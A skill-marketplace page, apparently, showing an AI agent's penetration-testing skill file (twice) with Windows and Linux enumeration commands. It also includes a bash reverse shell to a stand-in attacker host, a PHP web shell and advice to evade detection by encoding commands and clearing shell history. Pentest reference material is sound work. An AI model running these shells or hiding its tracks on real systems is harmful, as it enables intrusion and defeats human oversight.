Run any Skill in Manus with one click

command-execution

Security-focused command execution techniques for penetration testing. Use this skill when executing system commands during authorized security assessments. Covers Windows and Linux command execution, common security testing commands, and best practices for avoiding detection.

Run Skill in Manus

Overview

Install command

npx skills add https://github.com/iammm0/secbot --skill command-execution

Copy and paste this command into Claude Code to install the skill

Source

iammm0/secbot

Stars70

Forks12

UpdatedMarch 11, 2026 at 04:03

SKILL.md

readonly

name	command-execution
description	Security-focused command execution techniques for penetration testing. Use this skill when executing system commands during authorized security assessments. Covers Windows and Linux command execution, common security testing commands, and best practices for avoiding detection.
version	1.0.0
author	Secbot Security Team
tags	["command","execution","terminal","shell","pentest"]
triggers	["execute_command","run","shell","cmd","bash","command"]
prerequisites	["authorized_target"]

Command Execution in Security Testing

Overview

This skill provides guidance on executing system commands effectively during penetration testing engagements.

Windows Commands

Network Discovery

# Local IP configuration
ipconfig /all

# Network connections
netstat -ano

# Active connections
netstat -ano | findstr ESTABLISHED

# ARP table
arp -a

# DNS lookup
nslookup target.com

Process Management

# List processes
tasklist /v

# Find specific process
tasklist | findstr python

# Kill process
taskkill /F /PID <pid>

File System

# List directory
dir /a /s

# Find files
dir /s /b *.exe

# File attributes
attrib

User & Group

# User accounts
net user

# Current user
whoami /all

# Local groups
net localgroup

# User info
net user <username>

Linux Commands

Network Discovery

# Network interfaces
ip addr show

# Listening ports
netstat -tulpn

# Active connections
ss -tulwn

# ARP table
arp -a

# DNS resolution
dig target.com

Process Management

# List processes
ps aux

# Find process
ps aux | grep python

# Kill process
kill -9 <pid>

# Process tree
pstree

File System

# Find executables
find / -perm -4000 2>/dev/null

# Recent files
find / -mtime -1 2>/dev/null

# SUID files
find / -perm -4000 -type f

User & Group

# Current user
id

# Sudoers
cat /etc/sudoers

# User accounts
cat /etc/passwd

# Groups
cat /etc/group

Security Testing Commands

Enumeration

# Service version detection
nmap -sV <target>

# OS detection
nmap -O <target>

# Vulnerability scripts
nmap --script vuln <target>

Web Testing

# curl basic
curl -v http://target

# POST request
curl -X POST -d "param=value" http://target

# SSL testing
curl -k https://target

Shells

# Reverse shell
bash -i >& /dev/tcp/attacker/port 0>&1

# Web shell upload test
echo "<?php system(\$_GET['cmd']); ?>" > shell.php

Best Practices

Avoid Detection
- Use encoded commands when possible
- Limit command output visibility
- Clear history after commands: history -c
Error Handling
- Always check return codes
- Redirect stderr: 2>&1
- Use timeout for long-running commands
Cross-Platform
- Use portable commands when possible
- Test commands in isolated environment first
- Consider WSL for Linux tools on Windows

Timeout Recommendations

Command Type	Recommended Timeout
Quick check (ping, whoami)	10s
Network scan	60s
File search	120s
Large transfer	300s

Output Parsing

Extract specific information from command output:

# Get IP only
ipconfig | findstr "IPv4"

# Get specific field
netstat -ano | findstr :80

# Count results
netstat -ano | findstr ESTABLISHED | find /c /v ""

More from this repository

same repository

execgo-agent-bridge

iammm0/secbot

Route shell, runtime.command, runtime.script, mcp.call, cli.run, or task_graph.submit work through Secbot's ExecGo-backed control tools.

2026-05-2970

system-commands

iammm0/secbot

System-level commands for security assessment and system enumeration. Use this skill when performing local system reconnaissance, process analysis, or system information gathering during authorized security testing.

2026-04-0470

system-control

iammm0/secbot

Comprehensive system control operations for security testing. Use this skill when you need unified access to file operations, process management, system information, and command execution through a single interface during authorized penetration testing.

2026-04-0470

terminal-session

iammm0/secbot

Persistent terminal session management for security testing. Use this skill when you need an interactive shell session that maintains state between commands (working directory, environment variables, etc.) during authorized penetration testing.

2026-03-1170

nmap-usage

iammm0/secbot

Professional nmap scanning techniques and optimization for penetration testing. Use this skill when you need to perform network reconnaissance, port scanning, or service enumeration during authorized security assessments.

2026-02-1170

Source

iammm0

iammm0/secbot

View GitHub Repository View Creator Repositories

Install command

Download

Run Skill in Manus

Useful forSOC

Information Security AnalystsComputer and Mathematical Occupations15-1212L4

name	command-execution
description	Security-focused command execution techniques for penetration testing. Use this skill when executing system commands during authorized security assessments. Covers Windows and Linux command execution, common security testing commands, and best practices for avoiding detection.
version	1.0.0
author	Secbot Security Team
tags	["command","execution","terminal","shell","pentest"]
triggers	["execute_command","run","shell","cmd","bash","command"]
prerequisites	["authorized_target"]

Command Execution in Security Testing

Overview

This skill provides guidance on executing system commands effectively during penetration testing engagements.

Windows Commands

Network Discovery

# Local IP configuration
ipconfig /all

# Network connections
netstat -ano

# Active connections
netstat -ano | findstr ESTABLISHED

# ARP table
arp -a

# DNS lookup
nslookup target.com

Process Management

# List processes
tasklist /v

# Find specific process
tasklist | findstr python

# Kill process
taskkill /F /PID <pid>

File System

# List directory
dir /a /s

# Find files
dir /s /b *.exe

# File attributes
attrib

User & Group

# User accounts
net user

# Current user
whoami /all

# Local groups
net localgroup

# User info
net user <username>

Linux Commands

Network Discovery

# Network interfaces
ip addr show

# Listening ports
netstat -tulpn

# Active connections
ss -tulwn

# ARP table
arp -a

# DNS resolution
dig target.com

Process Management

# List processes
ps aux

# Find process
ps aux | grep python

# Kill process
kill -9 <pid>

# Process tree
pstree

File System

# Find executables
find / -perm -4000 2>/dev/null

# Recent files
find / -mtime -1 2>/dev/null

# SUID files
find / -perm -4000 -type f

User & Group

# Current user
id

# Sudoers
cat /etc/sudoers

# User accounts
cat /etc/passwd

# Groups
cat /etc/group

Security Testing Commands

Enumeration

# Service version detection
nmap -sV <target>

# OS detection
nmap -O <target>

# Vulnerability scripts
nmap --script vuln <target>

Web Testing

# curl basic
curl -v http://target

# POST request
curl -X POST -d "param=value" http://target

# SSL testing
curl -k https://target

Shells

# Reverse shell
bash -i >& /dev/tcp/attacker/port 0>&1

# Web shell upload test
echo "<?php system(\$_GET['cmd']); ?>" > shell.php

Best Practices

Avoid Detection
- Use encoded commands when possible
- Limit command output visibility
- Clear history after commands: history -c
Error Handling
- Always check return codes
- Redirect stderr: 2>&1
- Use timeout for long-running commands
Cross-Platform
- Use portable commands when possible
- Test commands in isolated environment first
- Consider WSL for Linux tools on Windows

Timeout Recommendations

Command Type	Recommended Timeout
Quick check (ping, whoami)	10s
Network scan	60s
File search	120s
Large transfer	300s

Output Parsing

Extract specific information from command output:

# Get IP only
ipconfig | findstr "IPv4"

# Get specific field
netstat -ano | findstr :80

# Count results
netstat -ano | findstr ESTABLISHED | find /c /v ""